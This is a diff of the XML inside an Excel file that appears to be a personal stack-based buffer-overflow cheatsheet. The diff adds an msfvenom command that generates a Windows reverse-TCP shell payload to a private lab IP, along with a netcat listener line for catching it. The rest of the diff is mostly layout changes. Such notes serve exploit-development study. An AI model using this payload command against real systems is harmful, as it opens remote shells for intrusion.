 <file path=xl/worksheets/sheet2.xml><?xml version="1.0" encoding="utf-8"?>
-<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0100-000000000000}">
   <dimension ref="A1:B41"/>
   <sheetViews>
     <sheetView showGridLines="0" topLeftCell="A25" workbookViewId="0">
       <selection activeCell="B17" sqref="B17"/>
     </sheetView>
   </sheetViews>
-  <sheetFormatPr defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
+  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
   <cols>
-    <col min="2" max="2" width="50.453125" bestFit="1" customWidth="1"/>
+    <col min="2" max="2" width="50.42578125" bestFit="1" customWidth="1"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:1" x14ac:dyDescent="0.35">
+    <row r="1" spans="1:1" x14ac:dyDescent="0.25">
       <c r="A1" t="s">
+        <v>63</v>
+      </c>
+    </row>
+    <row r="2" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A2" t="s">
+        <v>64</v>
+      </c>
+    </row>
+    <row r="3" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A3" t="s">
+        <v>65</v>
+      </c>
+    </row>
+    <row r="5" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A5" t="s">
         <v>66</v>
       </c>
     </row>
-    <row r="2" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A2" t="s">
+    <row r="7" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A7" t="s">
         <v>67</v>
       </c>
     </row>
-    <row r="3" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A3" t="s">
+    <row r="9" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A9" t="s">
         <v>68</v>
       </c>
     </row>
-    <row r="5" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A5" t="s">
+    <row r="11" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A11" t="s">
         <v>69</v>
       </c>
     </row>
-    <row r="7" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A7" t="s">
+    <row r="13" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A13" t="s">
         <v>70</v>
       </c>
     </row>
-    <row r="9" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A9" t="s">
+    <row r="14" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A14" t="s">
+        <v>92</v>
+      </c>
+    </row>
+    <row r="15" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A15" t="s">
         <v>71</v>
       </c>
     </row>
-    <row r="11" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A11" t="s">
+    <row r="17" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A17" t="s">
         <v>72</v>
       </c>
     </row>
-    <row r="13" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A13" t="s">
+    <row r="19" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A19" t="s">
+        <v>91</v>
+      </c>
+    </row>
+    <row r="20" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A20" t="s">
         <v>73</v>
       </c>
     </row>
-    <row r="14" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A14" t="s">
-        <v>95</v>
-      </c>
-    </row>
-    <row r="15" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A15" t="s">
+    <row r="21" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A21" t="s">
         <v>74</v>
       </c>
     </row>
-    <row r="17" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="A17" t="s">
+    <row r="23" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A23" t="s">
         <v>75</v>
       </c>
     </row>
-    <row r="19" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="A19" t="s">
-        <v>94</v>
-      </c>
-    </row>
-    <row r="20" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="A20" t="s">
+    <row r="25" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A25" t="s">
         <v>76</v>
       </c>
     </row>
-    <row r="21" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="A21" t="s">
+    <row r="27" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A27" t="s">
         <v>77</v>
       </c>
     </row>
-    <row r="23" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="A23" t="s">
+    <row r="29" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="B29" t="s">
         <v>78</v>
       </c>
     </row>
-    <row r="25" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="A25" t="s">
+    <row r="30" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="B30" t="s">
         <v>79</v>
       </c>
     </row>
-    <row r="27" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="A27" t="s">
+    <row r="31" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="B31" t="s">
+        <v>90</v>
+      </c>
+    </row>
+    <row r="32" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="B32" t="s">
         <v>80</v>
       </c>
     </row>
-    <row r="29" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="B29" t="s">
+    <row r="33" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="B33" t="s">
         <v>81</v>
       </c>
     </row>
-    <row r="30" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="B30" t="s">
+    <row r="34" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="B34" t="s">
         <v>82</v>
       </c>
     </row>
-    <row r="31" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="B31" t="s">
-        <v>93</v>
-      </c>
-    </row>
-    <row r="32" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="B32" t="s">
+    <row r="35" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="B35" t="s">
         <v>83</v>
       </c>
     </row>
-    <row r="33" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="B33" t="s">
+    <row r="36" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="B36" t="s">
         <v>84</v>
       </c>
     </row>
-    <row r="34" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="B34" t="s">
+    <row r="37" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A37" t="s">
+        <v>86</v>
+      </c>
+      <c r="B37" t="s">
         <v>85</v>
       </c>
     </row>
-    <row r="35" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="B35" t="s">
-        <v>86</v>
-      </c>
-    </row>
-    <row r="36" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="B36" t="s">
+    <row r="39" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="B39" t="s">
         <v>87</v>
       </c>
     </row>
-    <row r="37" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="A37" t="s">
+    <row r="40" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="B40" t="s">
+        <v>88</v>
+      </c>
+    </row>
+    <row r="41" spans="1:2" x14ac:dyDescent="0.25">
+      <c r="A41" t="s">
         <v>89</v>
-      </c>
-      <c r="B37" t="s">
-        <v>88</v>
-      </c>
-    </row>
-    <row r="39" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="B39" t="s">
-        <v>90</v>
-      </c>
-    </row>
-    <row r="40" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="B40" t="s">
-        <v>91</v>
-      </c>
-    </row>
-    <row r="41" spans="1:2" x14ac:dyDescent="0.35">
-      <c r="A41" t="s">
-        <v>92</v>
       </c>
     </row>
   </sheetData>
@@ -2305,96 +2274,96 @@
 </file>
 
 <file path=xl/worksheets/sheet3.xml><?xml version="1.0" encoding="utf-8"?>
-<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0200-000000000000}">
   <dimension ref="A1:A26"/>
   <sheetViews>
     <sheetView workbookViewId="0">
       <selection activeCell="A4" sqref="A4"/>
     </sheetView>
   </sheetViews>
-  <sheetFormatPr defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
+  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
   <cols>
     <col min="1" max="1" width="41" bestFit="1" customWidth="1"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:1" x14ac:dyDescent="0.35">
+    <row r="1" spans="1:1" x14ac:dyDescent="0.25">
       <c r="A1" t="s">
-        <v>66</v>
-      </c>
-    </row>
-    <row r="2" spans="1:1" x14ac:dyDescent="0.35">
+        <v>63</v>
+      </c>
+    </row>
+    <row r="2" spans="1:1" x14ac:dyDescent="0.25">
       <c r="A2" t="s">
+        <v>93</v>
+      </c>
+    </row>
+    <row r="3" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A3" t="s">
+        <v>94</v>
+      </c>
+    </row>
+    <row r="5" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A5" t="s">
+        <v>95</v>
+      </c>
+    </row>
+    <row r="6" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A6" t="s">
         <v>96</v>
       </c>
     </row>
-    <row r="3" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A3" t="s">
+    <row r="8" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A8" t="s">
         <v>97</v>
       </c>
     </row>
-    <row r="5" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A5" t="s">
+    <row r="10" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A10" t="s">
         <v>98</v>
       </c>
     </row>
-    <row r="6" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A6" t="s">
+    <row r="12" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A12" t="s">
         <v>99</v>
       </c>
     </row>
-    <row r="8" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A8" t="s">
+    <row r="14" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A14" t="s">
         <v>100</v>
       </c>
     </row>
-    <row r="10" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A10" t="s">
+    <row r="16" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A16" t="s">
         <v>101</v>
       </c>
     </row>
-    <row r="12" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A12" t="s">
+    <row r="17" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A17" t="s">
         <v>102</v>
       </c>
     </row>
-    <row r="14" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A14" t="s">
+    <row r="20" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A20" t="s">
         <v>103</v>
       </c>
     </row>
-    <row r="16" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A16" t="s">
+    <row r="22" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A22" t="s">
         <v>104</v>
       </c>
     </row>
-    <row r="17" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A17" t="s">
+    <row r="24" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A24" t="s">
         <v>105</v>
       </c>
     </row>
-    <row r="20" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A20" t="s">
+    <row r="25" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A25" t="s">
         <v>106</v>
       </c>
     </row>
-    <row r="22" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A22" t="s">
+    <row r="26" spans="1:1" x14ac:dyDescent="0.25">
+      <c r="A26" t="s">
         <v>107</v>
-      </c>
-    </row>
-    <row r="24" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A24" t="s">
-        <v>108</v>
-      </c>
-    </row>
-    <row r="25" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A25" t="s">
-        <v>109</v>
-      </c>
-    </row>
-    <row r="26" spans="1:1" x14ac:dyDescent="0.35">
-      <c r="A26" t="s">
-        <v>110</v>
       </c>
     </row>
   </sheetData>

--- a/BOF_Cheatsheet.xlsx
+++ b/BOF_Cheatsheet.xlsx
@@ -8,7 +8,7 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\ashwi\Documents\Cheatsheets\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{2427C919-F099-4605-86A9-AEF769B1F1C2}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{9E70A8C3-0714-47CD-B5B5-500FE720D611}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11310" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
@@ -27,7 +27,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="114" uniqueCount="111">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="117" uniqueCount="114">
   <si>
     <t xml:space="preserve">Stack Based buffer Overflow </t>
   </si>
@@ -362,6 +362,15 @@
   </si>
   <si>
     <t>X86, X64 Included with nops</t>
+  </si>
+  <si>
+    <t>msfvenom -p windows/shell_reverse_tcp LHOST=192.168.150.128 LPORT=8443 -b "\x00" -f py -v shellcode -n 48 AppendExit=true</t>
+  </si>
+  <si>
+    <t>Non-Stagged Included with nops, caught via nc -lnvp 8443</t>
+  </si>
+  <si>
+    <t>X86, X64 Included with nops, multi handler</t>
   </si>
 </sst>
 </file>
@@ -696,7 +705,7 @@
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
   </cellStyleXfs>
-  <cellXfs count="38">
+  <cellXfs count="39">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
@@ -776,6 +785,9 @@
     </xf>
     <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
       <alignment horizontal="center" vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="3" fillId="0" borderId="13" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="center" wrapText="1"/>
     </xf>
   </cellXfs>
   <cellStyles count="1">
@@ -1057,9 +1069,9 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0000-000000000000}">
-  <dimension ref="A1:H92"/>
+  <dimension ref="A1:H93"/>
   <sheetViews>
-    <sheetView showGridLines="0" tabSelected="1" topLeftCell="A25" zoomScale="90" zoomScaleNormal="90" workbookViewId="0">
+    <sheetView showGridLines="0" tabSelected="1" topLeftCell="A22" zoomScale="90" zoomScaleNormal="90" workbookViewId="0">
       <selection activeCell="D33" sqref="D33"/>
     </sheetView>
   </sheetViews>
@@ -1068,7 +1080,7 @@
     <col min="1" max="1" width="28.140625" bestFit="1" customWidth="1"/>
     <col min="2" max="2" width="20" style="1" bestFit="1" customWidth="1"/>
     <col min="3" max="3" width="93.85546875" customWidth="1"/>
-    <col min="4" max="4" width="46.5703125" customWidth="1"/>
+    <col min="4" max="4" width="49.5703125" customWidth="1"/>
     <col min="5" max="5" width="11.140625" bestFit="1" customWidth="1"/>
   </cols>
   <sheetData>
@@ -1456,53 +1468,57 @@
         <v>108</v>
       </c>
       <c r="D32" s="27" t="s">
-        <v>110</v>
+        <v>113</v>
       </c>
       <c r="E32" s="26"/>
       <c r="F32" s="26"/>
       <c r="G32" s="26"/>
       <c r="H32" s="26"/>
     </row>
-    <row r="33" spans="1:8" s="4" customFormat="1" ht="32.25" thickBot="1" x14ac:dyDescent="0.3">
+    <row r="33" spans="1:8" s="4" customFormat="1" ht="31.5" x14ac:dyDescent="0.25">
       <c r="A33" s="26"/>
-      <c r="B33" s="24" t="s">
-        <v>46</v>
-      </c>
-      <c r="C33" s="28" t="s">
-        <v>109</v>
-      </c>
-      <c r="D33" s="28" t="s">
-        <v>110</v>
+      <c r="B33" s="21" t="s">
+        <v>45</v>
+      </c>
+      <c r="C33" s="38" t="s">
+        <v>111</v>
+      </c>
+      <c r="D33" s="38" t="s">
+        <v>112</v>
       </c>
       <c r="E33" s="26"/>
       <c r="F33" s="26"/>
       <c r="G33" s="26"/>
       <c r="H33" s="26"/>
     </row>
-    <row r="34" spans="1:8" s="4" customFormat="1" ht="15.75" x14ac:dyDescent="0.25">
+    <row r="34" spans="1:8" s="4" customFormat="1" ht="32.25" thickBot="1" x14ac:dyDescent="0.3">
       <c r="A34" s="26"/>
-      <c r="B34" s="7"/>
-      <c r="C34" s="29"/>
-      <c r="D34" s="29"/>
+      <c r="B34" s="24" t="s">
+        <v>46</v>
+      </c>
+      <c r="C34" s="28" t="s">
+        <v>109</v>
+      </c>
+      <c r="D34" s="28" t="s">
+        <v>110</v>
+      </c>
       <c r="E34" s="26"/>
       <c r="F34" s="26"/>
       <c r="G34" s="26"/>
       <c r="H34" s="26"/>
     </row>
-    <row r="35" spans="1:8" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A35" s="6"/>
+    <row r="35" spans="1:8" s="4" customFormat="1" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="A35" s="26"/>
       <c r="B35" s="7"/>
-      <c r="C35" s="6"/>
-      <c r="D35" s="6"/>
-      <c r="E35" s="6"/>
-      <c r="F35" s="6"/>
-      <c r="G35" s="6"/>
-      <c r="H35" s="6"/>
+      <c r="C35" s="29"/>
+      <c r="D35" s="29"/>
+      <c r="E35" s="26"/>
+      <c r="F35" s="26"/>
+      <c r="G35" s="26"/>
+      <c r="H35" s="26"/>
     </row>
     <row r="36" spans="1:8" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A36" s="5" t="s">
-        <v>23</v>
-      </c>
+      <c r="A36" s="6"/>
       <c r="B36" s="7"/>
       <c r="C36" s="6"/>
       <c r="D36" s="6"/>
@@ -1511,17 +1527,13 @@
       <c r="G36" s="6"/>
       <c r="H36" s="6"/>
     </row>
-    <row r="37" spans="1:8" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="A37" s="6"/>
-      <c r="B37" s="11" t="s">
-        <v>24</v>
-      </c>
-      <c r="C37" s="30" t="s">
-        <v>25</v>
-      </c>
-      <c r="D37" s="13" t="s">
-        <v>27</v>
-      </c>
+    <row r="37" spans="1:8" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
+      <c r="A37" s="5" t="s">
+        <v>23</v>
+      </c>
+      <c r="B37" s="7"/>
+      <c r="C37" s="6"/>
+      <c r="D37" s="6"/>
       <c r="E37" s="6"/>
       <c r="F37" s="6"/>
       <c r="G37" s="6"/>
@@ -1529,43 +1541,49 @@
     </row>
     <row r="38" spans="1:8" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A38" s="6"/>
-      <c r="B38" s="21"/>
-      <c r="C38" s="22" t="s">
-        <v>26</v>
-      </c>
-      <c r="D38" s="16"/>
+      <c r="B38" s="11" t="s">
+        <v>24</v>
+      </c>
+      <c r="C38" s="30" t="s">
+        <v>25</v>
+      </c>
+      <c r="D38" s="13" t="s">
+        <v>27</v>
+      </c>
       <c r="E38" s="6"/>
       <c r="F38" s="6"/>
       <c r="G38" s="6"/>
       <c r="H38" s="6"/>
     </row>
-    <row r="39" spans="1:8" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
+    <row r="39" spans="1:8" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A39" s="6"/>
-      <c r="B39" s="24" t="s">
-        <v>28</v>
-      </c>
-      <c r="C39" s="25" t="s">
-        <v>29</v>
-      </c>
-      <c r="D39" s="19" t="s">
-        <v>30</v>
-      </c>
+      <c r="B39" s="21"/>
+      <c r="C39" s="22" t="s">
+        <v>26</v>
+      </c>
+      <c r="D39" s="16"/>
       <c r="E39" s="6"/>
       <c r="F39" s="6"/>
       <c r="G39" s="6"/>
       <c r="H39" s="6"/>
     </row>
-    <row r="40" spans="1:8" ht="15.75" x14ac:dyDescent="0.25">
+    <row r="40" spans="1:8" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
       <c r="A40" s="6"/>
-      <c r="B40" s="7"/>
-      <c r="C40" s="6"/>
-      <c r="D40" s="6"/>
+      <c r="B40" s="24" t="s">
+        <v>28</v>
+      </c>
+      <c r="C40" s="25" t="s">
+        <v>29</v>
+      </c>
+      <c r="D40" s="19" t="s">
+        <v>30</v>
+      </c>
       <c r="E40" s="6"/>
       <c r="F40" s="6"/>
       <c r="G40" s="6"/>
       <c r="H40" s="6"/>
     </row>
-    <row r="41" spans="1:8" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
+    <row r="41" spans="1:8" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A41" s="6"/>
       <c r="B41" s="7"/>
       <c r="C41" s="6"/>
@@ -1576,12 +1594,8 @@
       <c r="H41" s="6"/>
     </row>
     <row r="42" spans="1:8" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
-      <c r="A42" s="5" t="s">
-        <v>31</v>
-      </c>
-      <c r="B42" s="37" t="s">
-        <v>32</v>
-      </c>
+      <c r="A42" s="6"/>
+      <c r="B42" s="7"/>
       <c r="C42" s="6"/>
       <c r="D42" s="6"/>
       <c r="E42" s="6"/>
@@ -1589,31 +1603,29 @@
       <c r="G42" s="6"/>
       <c r="H42" s="6"/>
     </row>
-    <row r="43" spans="1:8" ht="15.75" x14ac:dyDescent="0.25">
-      <c r="A43" s="6"/>
-      <c r="B43" s="11" t="s">
-        <v>47</v>
-      </c>
-      <c r="C43" s="30" t="s">
-        <v>33</v>
-      </c>
-      <c r="D43" s="13" t="s">
-        <v>35</v>
-      </c>
+    <row r="43" spans="1:8" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
+      <c r="A43" s="5" t="s">
+        <v>31</v>
+      </c>
+      <c r="B43" s="37" t="s">
+        <v>32</v>
+      </c>
+      <c r="C43" s="6"/>
+      <c r="D43" s="6"/>
       <c r="E43" s="6"/>
       <c r="F43" s="6"/>
       <c r="G43" s="6"/>
       <c r="H43" s="6"/>
     </row>
-    <row r="44" spans="1:8" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
+    <row r="44" spans="1:8" ht="15.75" x14ac:dyDescent="0.25">
       <c r="A44" s="6"/>
-      <c r="B44" s="24" t="s">
-        <v>48</v>
-      </c>
-      <c r="C44" s="25" t="s">
-        <v>34</v>
-      </c>
-      <c r="D44" s="19" t="s">
+      <c r="B44" s="11" t="s">
+        <v>47</v>
+      </c>
+      <c r="C44" s="30" t="s">
+        <v>33</v>
+      </c>
+      <c r="D44" s="13" t="s">
         <v>35</v>
       </c>
       <c r="E44" s="6"/>
@@ -1621,11 +1633,17 @@
       <c r="G44" s="6"/>
       <c r="H44" s="6"/>
     </row>
-    <row r="45" spans="1:8" ht="15.75" x14ac:dyDescent="0.25">
+    <row r="45" spans="1:8" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
       <c r="A45" s="6"/>
-      <c r="B45" s="7"/>
-      <c r="C45" s="6"/>
-      <c r="D45" s="6"/>
+      <c r="B45" s="24" t="s">
+        <v>48</v>
+      </c>
+      <c r="C45" s="25" t="s">
+        <v>34</v>
+      </c>
+      <c r="D45" s="19" t="s">
+        <v>35</v>
+      </c>
       <c r="E45" s="6"/>
       <c r="F45" s="6"/>
       <c r="G45" s="6"/>
@@ -2100,6 +2118,16 @@
       <c r="F92" s="6"/>
       <c r="G92" s="6"/>
       <c r="H92" s="6"/>
+    </row>
+    <row r="93" spans="1:8" ht="15.75" x14ac:dyDescent="0.25">
+      <c r="A93" s="6"/>
+      <c r="B93" s="7"/>
+      <c r="C93" s="6"/>
+      <c r="D93" s="6"/>
+      <c r="E93" s="6"/>
+      <c r="F93" s="6"/>
+      <c r="G93" s="6"/>
+      <c r="H93" s="6"/>
     </row>
   </sheetData>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
